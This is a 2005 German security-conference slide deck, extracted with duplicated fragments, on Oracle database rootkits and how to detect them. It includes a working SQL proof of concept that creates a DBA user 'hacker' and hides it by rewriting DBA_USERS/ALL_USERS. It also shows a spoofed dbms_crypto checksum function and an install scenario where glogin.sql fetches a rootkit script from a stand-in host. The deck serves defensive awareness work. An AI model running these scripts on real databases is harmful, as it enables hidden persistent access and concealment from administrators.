Alexander Kornbrust - Oracle Rootkits - Eine Neue Gefahr Für Datenbanken?

Oracle Rootkits eine neue Gefahr fr Datenbanken?
Alexander Kornbrust 21-Juni-2005

Red-Database-Security GmbH
Alexander Kornbrust, 21-Juni-2005 V1.00
Agenda
1. 2. 3. 4. 5. 6. 7. 8. 9. 10.
Einfhrung OS Rootkits Oracle Rootkits Ausfhrungspfad Benutzer verstecken Prozesse verstecken PL/SQL Packages verndern System-Packages unwrappen Folgerungen F/A
OS Rootkit Definition Wikipedia: Ein Rootkit ist eine Sammlung von Softwarewerkzeugen, die nach dem Einbruch in ein Computersystem auf dem kompromittierten System installiert wird, um zuknftige Logins des Eindringlings zu verbergen, Prozesse zu verstecken und Daten mitzuschneiden.
Alexander Kornbrust, 21-Juni-2005
V1.00
OS Rootkit Was passiert, nachdem ein Hacker in einen Server eingebrochen ist? Hacker entfernt seine Spuren. Angreifer installiert im Betriebssystem ein Rootkit (=Hintertr), um spter jederzeit Zugriff darauf zu haben. Dieses Rootkit ist normalerweise vor dem Administrator versteckt.
V1.00
OS Rootkit Ergebnis des who Kommandos mit und ohne installiertem Rootkit. Ohne Rootkit
[root@picard root]# who root pts/0 Apr 1 12:25 root pts/1 Apr 1 12:44 root pts/1 Apr 1 12:44 ora pts/3 Mar 30 15:01 hacker pts/3 Feb 16 15:01
Mit Rootkit
[root@picard root pts/0 root pts/1 root pts/1 ora pts/3 root]# Apr 1 Apr 1 Apr 1 Mar 30 who 12:25 12:44 12:44 15:01
V1.00
Einfhrung
Betriebssysteme und Datenbanken sind in der Architektur ziemlich hnlich. Beide besitzen Benutzer Prozesse Jobs Ausfhrbare Objekte Symbolische Links Eine Datenbank ist eine Art von Betriebssystem.
Einfhrung
OS cmd
ps kill 1234
Oracle
select * from v$process alter system kill session '12,55'
SQL Server
select * from sysprocesses SELECT @var1 = spid FROM sysprocesses WHERE nt_username='andrew' AND spid<>@@spidEXEC ('kill '+@var1); View, Stored Procedures select * from view; exec procedure
DB2
list application force application (1234)
Postgres
select * from pg_stat_activity
Executa bles execute
View, Package, Procedures and Functions select * from view; exec procedure
View, Stored Procedures select * from view;
View, Stored Procedures select * from view; execute procedure
cd
alter session set current_schema =user01

Oracle Rootkits Implementierung eines Oracle Rootkits Oracle Execution Pfad Datenbank Benutzer verstecken Datenbank Prozesse verstecken Modifizieren von internen Funktionen Unwrappen von Oracle Packages Log-Cleaner
V1.00
Datenbank Rootkits Wege, ein (Oracle) Rootkit zu implementieren Das (Oracle) Objekt selbst ndern Den Ausfhrungspfad zum OracleObjekt ndern
V1.00
Oracle Ausfhrungspfad Wie lst Oracle Objektnamen auf? Beispiel: SQL> Select username from dba_users;
Namensauflsung: Gibt es ein lokales Objekt im aktuellen Schema (Tabelle, View, ) namens dba_users? Wenn ja, verwende es. Gibt es ein privates Synonym namens dba_users? Wenn ja, verwende es. Gibt es ein Public Synonym namens dba_users? Wenn ja, verwende es. Wird VPD verwendet? Wenn ja, modifiziere SQL Statement.
10
Oracle Ausfhrungspfad
User 1
Tables Views Private Synonyms Functions Procedures Packages
User n
Tables Views Private Synonyms Func. Proc. Pack.
Public Synonyms
SYS Views Tables Virtual Private Database

Functions
Procedures
Packages
11
Ausfhrungspfad Der Ausfhrungspfad kann gendert werden durch Erzeugung eines lokalen Objektes mit identischem Namen Erzeugung eines privaten Synonyms, das auf ein anderes Objekt zeigt Erzeugung eines Public Synonyms, das auf ein anderes Objekt zeigt. Wechsel in ein anderes Schema Verwendung der Virtual Private Database (VPD) Verwendung von PL/SQL Native
12
Datenbankbenutzer verstecken Benutzerverwaltung in Oracle Benutzer und Rollen werden zusammen in der Tabelle SYS.USER$ gespeichert Benutzer besitzen das Flag TYPE# = 1 Rollen besitzen das Flag TYPE# = 0 Die Views dba_users und all_users vereinfachen den Zugriff Synonyme fr dba_users und all_users
V1.00
13
Datenbankbenutzer verstecken Beispiel: Erzeugung eins Datenbankbenutzers names Hacker
SQL> create user hacker identified by hacker;
SQL> grant dba to hacker;
V1.00
14
Datenbankbenutzer verstecken Beispiel: Anzeigen aller Datenbankbenutzer SQL> select username from dba_users;
USERNAME -----------------------------SYS SYSTEM DBSNMP SYSMAN MGMT_VIEW OUTLN MDSYS ORDSYS EXFSYS HACKER []
V1.00
15
Datenbankbenutzer verstecken
Enterprise Manager (Java) Enterprise Manager (Web) Quest TOAD
V1.00
16
Datenbankbenutzer verstecken Zustzliche Zeile an die View anhngen
V1.00
17
Datenbankbenutzer verstecken
Enterprise Manager (Java) Enterprise Manager (Web) Quest TOAD
V1.00
18
Datenbankbenutzer verstecken TOAD benutzt die View ALL_USERS anstatt der DBA_USERS. Deshalb ist der Benutzer HACKER immer noch sichtbar.
V1.00
19
Datenbankbenutzer verstecken Nun ist der Benutzer auch in TOAD verschwunden
V1.00
20
Prozesse verstecken Prozessmanagement in Oracle Prozesse sind in einer speziellen View v$session die im Schema SYS liegt gespeichert Public Synonym v$session verweist auf v_$session Die View v_$session dient zum Zugriff auf v$session
V1.00
21
Prozesse verstecken
Beispiel: Anzeigen aller Datenbankprozesse SQL> select sid,serial#, program from v$session;
SID SERIAL# ----- ---------------297 11337 298 23019 300 35 301 4 304 1739 305 29265 306 2186 307 30 308 69 310 5611 311 49 [...] Red-Database-Security GmbH PROGRAM -----------------------------------OMS OMS OMS OMS OMS sqlplus.exe OMS emagent@picard.rds (TNS V1 OMS OMS OMS
V1.00
22
Prozesse verstecken Verndern der Views (v$session, gv_$session, flow_sessions, v_$process) durch Anhngen von username != 'HACKER'
V1.00
23
Prozesse verstecken Eine weitere Option ist das verndern des Ausfhrungspfades. Dadurch bleibt die originale View v$session unverndert. Vernderung des Public Synonym v$session das auf eine vernderte View user.vsess_hack zeigt.
SQL> create public public synonym v$session for user.vsess_hack;
Erzeugung eines (privaten) Synonyms v$session das auf eine andere (vernderte) View user.vsess_hack weist.
SQL> create synonym v$session for user.vsess_hack;
24
PL/SQL Packages verndern Die Vernderung von PL/SQL-Packages ist etwas komplizierter Packages, die im PLSQL-Quellcode vorliegen, sind sehr einfach zu verndern. Einfach den eigenen PL/SQL-Sourcecode einfgen. Die meisten internen Packages von Oracle sind gewrapped (=obfuscated). Es gibt verschiedene Mglichkeiten bzw. Tools, um wieder an den PL/SQL-Sourcecode zu gelangen.
V1.00
25
PL/SQL-Wrapping Auszug aus der Oracle Dokumentation: 9i: the Wrap Utility, a standalone programming utility that encrypts PL/SQL source code. You can use the Wrap Utility to deliver PL/SQL applications without exposing your source code. 10g: By hiding application internals, the wrap utility makes it difficult for other developers to misuse your application, or business competitors to see your algorithms.
Wrappen ist KEIN wirksamer Schutz

26
PL/SQL Packages verndern Aber auch ohne PLSQL-Unwrapper kann man interne Packages (z.B. dbms_crypto) modifizieren, wie das folgende Beispiel zeigt: Berechne die md5 Checksumme von Quellcodezeilen (Hier: Eine Zeile der View dba_users) Ausfhrungspfad der MD5-Funktion verndern Aufruf der vernderten MD5-Funktion
V1.00
27
PL/SQL Packages verndern Berechnung einer MD5-Checksumme mit dbms_crypto

declare code_source clob; md5hash varchar2(32); begin code_source := 'and pr.resource# = 1'; md5hash := rawtohex(dbms_crypto.hash(typ => dbms_crypto.HASH_MD5, src => code_source)); dbms_output.put_line('MD5='||md5hash); end; /
MD5=08590BBCA18F6A84052F6670377E28E4
V1.00
28
PL/SQL Packages verndern

nderung des Ausfhrungspfades durch das Erzeugen eines lokalen Packages namens dbms_crypto mit der selben Spezifikation wie dbms_crypto
[] FUNCTION Hash (src IN CLOB CHARACTER SET ANY_CS,typ IN PLS_INTEGER) RETURN RAW AS buffer varchar2(60); BEGIN buffer := src; IF (buffer='and pr.resource# = 1 and u.name != HACKER;') THEN RETURN(SYS.dbms_crypto.hash(and pr.resource# = 1,typ)); END IF; RETURN(SYS.dbms_crypto.hash(src,typ)); END; []
V1.00
29
PL/SQL Packages verndern Berechnung der MD5-Checksumme mit dem modifizierten dbms_crypto-Package
declare code_source clob; md5hash varchar2(32); begin code_source := 'and pr.resource# = 1 and u.name != HACKER;'; md5hash := rawtohex(dbms_crypto.hash(typ => dbms_crypto.HASH_MD5, src => code_source)); dbms_output.put_line('MD5='||md5hash); end; /
Liefert die ursprngliche und damit falsche MD5 Checksumme zurck:

MD5=08590BBCA18F6A84052F6670377E28E4
30
Mgliche Szenarien I Installation ber DBA-Client Booten des DBA-PCs mit einer Boot-CD (z.B. Windows PE) Modifikation der Datei glogin.sql und Verweis auf eine externe Webseite (@http://www.evildba.com/install_rootkit.sql) Nach einigen Tagen wird die RootkitInstallations-Datei auf den Webserver www.evildba.com eingespielt Nun wird beim Connect auf jeder Datenbank das Rootkit von www.evildba.com installiert.
31
Mgliche Szenarien II Installation ber den ungeschtzten TNS Listener (bis einschlielich 9i) Listener.log-Datei wird in glogin.sql umbenannt Rookit-Code wird in die glogin.sql geschrieben Beim nchsten Start von Sql*Plus auf dem Server wird das Rootkit installiert.
V1.00
32
Mgliche Szenarien III Erweiterung der normalen Privilegien und Installation des Rootkits Normaler Benutzer erweitert seine Rechte ber Lcke in Oracle-Packages, z.B. dbms_metadata Installation des Oracle Rootkits Spuren entfernen
V1.00
33
Rootkit Pseudocode Installiere versteckten Benutzer (z.B. in einem gewrappten System-Package) Installiere Password-Sniffer (via Password-VerifyFunction) Log-Cleaner Lsche SGA Lsche Redo-Log Lsche Listener.log
V1.00
34
Rootkit Proof of Concept

set linesize 2000 set long 90000 EXECUTE DBMS_METADATA.SET_TRANSFORM_PARAM( DBMS_METADATA.SESSION_TRANSFORM,'STORAGE',false); spool rk_source.sql select replace(cast(dbms_metadata.get_ddl('VIEW','ALL_USERS') as VARCHAR2(4000)),'where','where u.name !=''HACKER'' and ') from dual union select '/' from dual; select replace(cast(dbms_metadata.get_ddl('VIEW','DBA_USERS') as VARCHAR2(4000)),'where','where u.name !=''HACKER'' and ') from dual union select '/' from dual; spool off create user hacker identified by hackerpw; grant dba to hacker; @rk_source.sql
35
Rootkits entdecken Um nderungen in einem Repository zu entdecken, ist es notwendig, dass man von allen Datenbank-Objekten eine Checksumme bildet Und das Datenbank-Repository mit dieser Baseline auf vernderte oder neu hinzugekommene Objekte vergleicht.
Die Checksummen mssen extern berechnet werden, da die Datenbank ja kompromittiert sein knnte.
36
Rootkits entdecken
V1.00
37
Folgerungen Modifikationen von Metadaten ist ein allgemeines Problem, da es keine zustzliche Sicherheitsschicht innerhalb des Repositories gibt (z.B. Views schtzen). Es betrifft alle Repository basierten Systeme. Datenbanken (z.B. Oracle, DB2, MS SQL, Postgres, ) Repository basierte Software (z.B. Siebel, ) Selbstentwickelte Software mit eigenem Benutzermanagement (z.B. Webanwendungen) Datenbank Software ist ebenso betroffen (z.B. Administration Tools, Vulnerability Scanner, )
38
Folgerungen Tipps fr sicherere Programme Verwendung von Basis Tabellen anstatt View bei kritischen Objekten (z.B. users, processes) Verwendung von absoluten Ausfhrungspfaden bei kritischen Objekten (z.B. SYS.dbms_crypto) Anwendung (z.B. Datenbank) selbst sikkte das Repository nach Vernderungen berprfen Regelmiger Vergleich des Repositories gegen eine (sichere) Baseline
39
Zustzliche Links
Red-Database-Security GmbH http://www.red-database-security.com
V1.00
40
Kontakt
Red-Database-Security GmbH Bliesstrasse 16 D-66538 Neunkirchen
Telefon: +49 (0)6821 95 17 637 Fax: +49 (0)6821 91 27 354 E-Mail: info at red-database-security.com
V1.00
41

Alexander Kornbrust - Oracle Rootkits - Eine Neue Gefahr Für Datenbanken?

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Alexander Kornbrust - Oracle Rootkits - Eine Neue Gefahr Für Datenbanken?

Hochgeladen von

Copyright:

Verfügbare Formate

Oracle Rootkits eine neue Gefahr fr Datenbanken?

Alexander Kornbrust 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Executa bles execute

View, Stored Procedures select * from view;

View, Stored Procedures select * from view; execute procedure

alter session set current_schema =user01

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

SYS Views Tables Virtual Private Database

Alexander Kornbrust, 21-Juni-2005

Datenbankbenutzer verstecken Beispiel: Erzeugung eins Datenbankbenutzers names Hacker

SQL> create user hacker identified by hacker;

SQL> grant dba to hacker;

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Datenbankbenutzer verstecken Zustzliche Zeile an die View anhngen

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Datenbankbenutzer verstecken Nun ist der Benutzer auch in TOAD verschwunden

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Wrappen ist KEIN wirksamer Schutz

Alexander Kornbrust, 21-Juni-2005

PL/SQL Packages verndern Berechnung einer MD5-Checksumme mit dbms_crypto

Alexander Kornbrust, 21-Juni-2005

PL/SQL Packages verndern

Alexander Kornbrust, 21-Juni-2005

Liefert die ursprngliche und damit falsche MD5 Checksumme zurck:

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Alexander Kornbrust, 21-Juni-2005

Rootkit Proof of Concept

Alexander Kornbrust, 21-Juni-2005

Red-Database-Security GmbH http://www.red-database-security.com

Alexander Kornbrust, 21-Juni-2005

Red-Database-Security GmbH Bliesstrasse 16 D-66538 Neunkirchen

Alexander Kornbrust, 21-Juni-2005

Das könnte Ihnen auch gefallen